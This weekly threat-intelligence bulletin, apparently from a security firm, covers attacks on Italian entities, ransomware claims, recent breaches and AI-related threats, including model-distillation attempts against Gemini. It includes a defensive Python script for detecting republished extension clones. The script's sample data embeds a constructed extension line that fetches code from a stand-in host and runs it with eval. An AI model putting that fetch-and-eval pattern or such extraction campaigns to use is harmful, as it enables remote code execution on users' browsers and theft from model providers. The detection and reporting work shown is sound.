New attacks in Italy, reported data breaches, AI and cybersecurity
Italy: offensives target the country and the Olympic Games
Over the past week, several attacks targeting Italian entities were tracked. The Municipality of Chioggia and SST Chioggia reported they are managing an ongoing cyberattack that affected SST Chioggia’s digital systems, with possible impacts on certain activities and services managed by the company. A Signal-themed phishing operation was detected, aimed at obtaining potential victims’ personal information by urging them to follow an alleged account verification procedure. In parallel, both INPS-themed phishing and smishing campaigns aimed at stealing personal data were observed, as well as a new activity reported by the Polizia di Stato and the PS Online Police Station that exploits trust among WhatsApp contacts to compromise accounts, which are then used to send further phishing messages to the victim’s contacts. In addition, a new Remcos RAT distribution campaign was observed.

Turning to the ransomware landscape, TA505 claimed on its leak site the compromise of Labinf S.p.A.; Qilin Team that of Parente Fireworks Group S.r.l.; The Gentlemen that of Silvi S.r.l.; and Payouts King that of Sofinter S.p.A., although based on the latest analysis the target no longer appears on the adversary’s DLS.

In addition, the hacktivist collective BD Anonymous, allegedly of South Asian/Bengali origin, claimed DDoS offensives against the following Italian portals: the Port Authority of Olbia and Golfo Aranci, the Public Connectivity System (SPC), and the Regional Council of the Aosta Valley. Finally, the pro-Russian collective NoName057(16) once again directed its attacks against targets related to the Milano Cortina 2026 Winter Olympic Games. Those targeted include the Spanish Olympic Committee, the Lithuanian Olympic Committee, the Polish Olympic Committee (also targeted by BD Anonymous), Cortina Parking, and SEA Milan Airports.
Data breaches: security incidents impact the European Commission, SmarterTools, and BridgePay Network Solutions
The European Commission confirmed it suffered a cyberattack affecting the central system used to manage staff mobile devices. The incident, detected on 30 January 2026, may have enabled access to personal data of some employees, including names and phone numbers. The Commission stated the incident will be subject to an in-depth analysis and that it will continue to monitor the situation, taking all necessary measures to ensure the security of its systems—showing that even the most protected institutions remain vulnerable when they rely on third-party software. SmarterTools also confirmed that on 29 January 2026 its corporate network was compromised, an incident the company attributes to a group referred to as “Warlock Group”, presumably attributable to the Warlock ransomware operator. The company stated that—being today primarily a Linux company—around 12 Windows servers were involved, while Linux servers were not impacted, and that it immediately shut down servers at both locations and disabled internet access until assessment and system recovery/rebuild were completed. Finally, the U.S. provider of payment gateway and transaction processing services BridgePay Network Solutions confirmed it was hit by a ransomware attack that caused several systems to become unavailable, resulting in a service disruption.
AI: increased use of LLMs in attacks
Artificial intelligence is reshaping the cybersecurity landscape in a profoundly ambivalent way. In this regard, Google Threat Intelligence Group published an update on offensive AI use in Q4 2025, highlighting a growing integration of LLMs across the entire attack lifecycle. No direct attacks against frontier models by APT actors were observed; however, attempts at model extraction or “distillation attacks” increased, i.e., use of otherwise legitimate APIs to probe a model and transfer its capabilities to another model via knowledge distillation (KD), posing an intellectual property theft risk for providers. One case recorded over 100,000 prompts intended to force exposure of Gemini’s reasoning traces; the activity was detected and mitigated in real time. In addition, security researchers tracked a large-scale malicious Chrome extension campaign dubbed AiFrame, which leveraged the growing popularity of AI tools to compromise more than 260,000 users. The analysis identified thirty extensions apparently dedicated to AI assistance, content summarization, and Gmail support which, while presenting themselves as legitimate tools for ChatGPT, Claude, Gemini, and Grok, conceal a sophisticated remotely controlled architecture. The attackers use the “extension spraying” technique to systematically evade takedowns: when an extension is removed, it is immediately republished under a new identifier while keeping the same code, permissions, and infrastructure.
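Because extension spraying keeps the code, permissions, and infrastructure constant and changes only the store identifier and branding, a defender can detect republished clones by fingerprinting what stays the same rather than what changes. The script below is an added example written for this page (not Telsy's tooling and not derived from the AiFrame samples): it builds a fingerprint from an extension's permission set, content-script match patterns, and a hash of its bundled code, then clusters extension IDs that share one. The manifests and IDs are constructed for illustration.

```python
import hashlib
import json
from collections import defaultdict

# Constructed sample inventory (hypothetical IDs, names and code; not real
# store entries). The first and third entries share code and permissions
# under different identifiers and names, as in an "extension spraying" cycle.
SAMPLE_EXTENSIONS = [
    {
        "id": "ext-id-0001-constructed",
        "name": "ChatGPT Quick Helper",
        "manifest": {
            "permissions": ["storage", "tabs", "scripting"],
            "host_permissions": ["<all_urls>"],
            "content_scripts": [{"matches": ["https://mail.google.com/*", "<all_urls>"]}],
        },
        "code": "chrome.runtime.onInstalled.addListener(()=>fetch('https://cfg.example-constructed.invalid/c').then(r=>r.text()).then(eval));",
    },
    {
        "id": "ext-id-0002-constructed",
        "name": "Page Summarizer",
        "manifest": {
            "permissions": ["storage"],
            "host_permissions": [],
            "content_scripts": [{"matches": ["https://example.org/*"]}],
        },
        "code": "document.addEventListener('DOMContentLoaded',()=>console.log('summarize'));",
    },
    {
        "id": "ext-id-0003-constructed",
        "name": "Gemini Gmail Assistant",
        "manifest": {
            # Same permissions as the first entry, listed in a different order.
            "permissions": ["scripting", "storage", "tabs"],
            "host_permissions": ["<all_urls>"],
            "content_scripts": [{"matches": ["<all_urls>", "https://mail.google.com/*"]}],
        },
        # Byte-identical code to the first entry.
        "code": "chrome.runtime.onInstalled.addListener(()=>fetch('https://cfg.example-constructed.invalid/c').then(r=>r.text()).then(eval));",
    },
]


def fingerprint(manifest: dict, code: str) -> str:
    """Hash the invariants of an extension: sorted permissions, sorted
    host permissions, sorted content-script match patterns, and the
    SHA-256 of the bundled code. Name and store ID are deliberately
    excluded because those are exactly what a republish changes."""
    invariants = {
        "permissions": sorted(manifest.get("permissions", [])),
        "host_permissions": sorted(manifest.get("host_permissions", [])),
        "matches": sorted(
            m for cs in manifest.get("content_scripts", []) for m in cs.get("matches", [])
        ),
        "code_sha256": hashlib.sha256(code.encode("utf-8")).hexdigest(),
    }
    canonical = json.dumps(invariants, sort_keys=True, separators=(",", ":"))
    return hashlib.sha256(canonical.encode("utf-8")).hexdigest()[:16]


def find_clusters(extensions: list) -> dict:
    """Group extension IDs by fingerprint and return only groups with more
    than one member, i.e. likely republished clones of the same package."""
    groups = defaultdict(list)
    for ext in extensions:
        groups[fingerprint(ext["manifest"], ext["code"])].append(ext["id"])
    return {fp: sorted(ids) for fp, ids in groups.items() if len(ids) > 1}


def broad_access_ids(extensions: list) -> list:
    """List IDs that request access to every origin, a trait worth
    reviewing on its own even when no clone is found."""
    return sorted(
        ext["id"]
        for ext in extensions
        if "<all_urls>" in ext["manifest"].get("host_permissions", [])
    )


if __name__ == "__main__":
    for fp, ids in find_clusters(SAMPLE_EXTENSIONS).items():
        print(f"fingerprint {fp}: {len(ids)} IDs share code/permissions -> {ids}")
    print("broad host access:", broad_access_ids(SAMPLE_EXTENSIONS))
```

Run against an export of installed or store-listed extensions, a cluster of two or more IDs with one fingerprint is the signal to review: a takedown of one ID does not help if its twin is still installed. In practice, the code hash can be computed over the whole unpacked package rather than a single script, and fingerprints of known-bad packages can be retained so that a newly published twin is matched immediately.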
Weekly Threats is Telsy’s weekly update on the latest developments regarding cyberattacks and threat actors worldwide, produced by our Threat Intelligence & Response team.
The team is made up of security analysts and researchers with both technical and investigative expertise, as well as recognized international experience.
Through continuous monitoring of cyber threats and geopolitical events, it produces and provides organizations with valuable information to anticipate attacks and understand their impact, while ensuring a reliable partner in the event of a cyber incident.
